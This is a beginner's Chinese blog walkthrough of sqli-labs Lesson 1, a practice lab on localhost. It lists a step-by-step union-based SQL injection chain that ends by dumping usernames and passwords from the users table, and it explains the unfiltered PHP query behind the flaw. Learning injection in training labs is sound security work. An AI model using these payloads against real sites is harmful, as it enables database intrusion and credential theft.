sqli_lab_lesson1

2021-10-10

sqli-lab-lesson1问题解析（萌新版）

博主作为一位刚接触计算机萌新，有很多不懂的东西需要学习。以下是博主在按照别人的攻略通过sqli-libs-lesson1的遇到问题以及查找到的解答。

1.具体步骤（攻略链接：https://blog.csdn.net/weixin_51356351/article/details/109198820以下图片是博主根据攻略输入指令所得,部分内容有稍微进行修改）

判断注入点—-判断是数字型还是字符型—-查询列数—-查询显示位—-获取数据库名—-获取数据库中的表名—-获取列名—-获取列中的数据其实不管是联合查询还是盲注之类的基本都这样，大同小异。

①http://localhost/sqli-labs-master/Less-1/?id=1'

②http://localhost/sqli-labs-master/Less-1/?id=1' – -

③http://localhost/sqli-labs-master/Less-1/?id=1' and 1=1– -

④http://localhost/sqli-labs-master/Less-1/?id=1' and 1=2– -

⑤http://localhost/sqli-labs-master/Less-1/?id=1' order by 3– -

⑥http://localhost/sqli-labs-master/Less-1/?id=1' order by 4– -

⑦http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3– -

⑧http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),user()– -

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=“security”),3– -

⑨http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3 – -

⑩http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat_ws(id,username,password)) from users),3– -

2.问题以及分析

a.?id=1’目的：根据报错判断数据库类型是MySQL；错误点在于id=1 和 LIMIT0,1’之间多了一个’,所以要将LIMIT之前的单引号闭合。

例如?id=1’and’1’=’1

b.源码：$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;
分析：Id参数在拼接sql语句时，未对id进行任何的过滤等操作，导致了注入漏洞。为了执行查询语句select，需要注释掉末尾的单引号

http://localhost/sqli-labs-master/Less-1/?id=1' – -:单引号依然没有闭合，因为 – 直接连接了LTMIT，所以应当在 – 后加空格，一般浏览器传数据的时候不会将输入的空格传到服务器，所以要使用 +或编码值%20，即–+或–%20。这里使用– -也起到了同样的效果。

c.order by 语句用于查询数据库有几列。

d.union操作符用于合并两个或多个SELECT语句的结果集。

e.user()用户名

f.database()数据库名

g.concat_ws ()含有分隔符地连接字符串

h.select语句建议去阅读这篇文章。https://blog.51cto.com/jimshu/1363101#:~:text=SELECT%E8%AF%AD%E5%8F%A5%E6%98%AF%20T-SQL%20%E4%B8%AD%E6%9C%80%E9%87%8D%E8%A6%81%E7%9A%84%E6%9F%A5%E8%AF%A2%E8%AF%AD%E5%8F%A5%E3%80%82%20SELECT%20%E8%AF%AD%E5%8F%A5%E5%8F%AF%E8%83%BD%E8%BF%94%E5%9B%9E%E4%B8%80%E8%A1%8C%E8%AE%B0%E5%BD%95%EF%BC%88record%EF%BC%89%EF%BC%8C%E4%B9%9F%E5%8F%AF%E8%83%BD%E8%BF%94%E5%9B%9E%E4%B8%80%E4%B8%AA%E7%BB%93%E6%9E%9C%E9%9B%86%EF%BC%88result%20set%EF%BC%89%E3%80%82%20SELECT%E8%AF%AD%E5%8F%A5%E5%8F%AF%E4%BB%A5%E5%8C%85%E5%90%AB%E5%A4%9A%E4%B8%AA%E5%AD%90%E5%8F%A5%EF%BC%8C%E4%BB%8E%E8%80%8C%E6%9E%84%E6%88%90%E5%A4%8D%E6%9D%82%E7%9A%84%E6%9F%A5%E8%AF%A2%E3%80%82%20%E5%B8%B8%E7%94%A8%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%AD%90%E5%8F%A5%E6%9C%89%E4%BB%A5%E4%B8%8B%E5%87%A0%E4%B8%AA%EF%BC%9A,%E5%AD%90%E5%8F%A5%EF%BC%8C%E5%AF%B9%E8%BE%93%E5%87%BA%E8%BF%9B%E8%A1%8C%E6%8E%92%E5%BA%8F%E3%80%82%201.%20%E8%AF%AD%E6%B3%95%E8%A7%A3%E9%87%8A%20SELECT%20%E5%AD%90%E5%8F%A5%E4%B8%8E%E5%85%B6%E5%AE%83%E5%AD%90%E5%8F%A5%EF%BC%88%E8%87%B3%E5%B0%91%E5%8C%85%E5%90%AB%20FROM%20%E5%AD%90%E5%8F%A5%EF%BC%89%E7%BB%84%E6%88%90%E4%B8%80%E4%B8%AA%E6%9F%A5%E8%AF%A2%EF%BC%8CSELECT%20%E5%AD%90%E5%8F%A5%E7%94%A8%E4%BA%8E%E7%AD%9B%E9%80%89%E9%9C%80%E8%A6%81%E8%BE%93%E5%87%BA%E7%9A%84%E5%88%97%E6%88%96%E8%80%85%E8%A1%A8%E8%BE%BE%E5%BC%8F%E3%80%82

打赏

版权声明： 本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！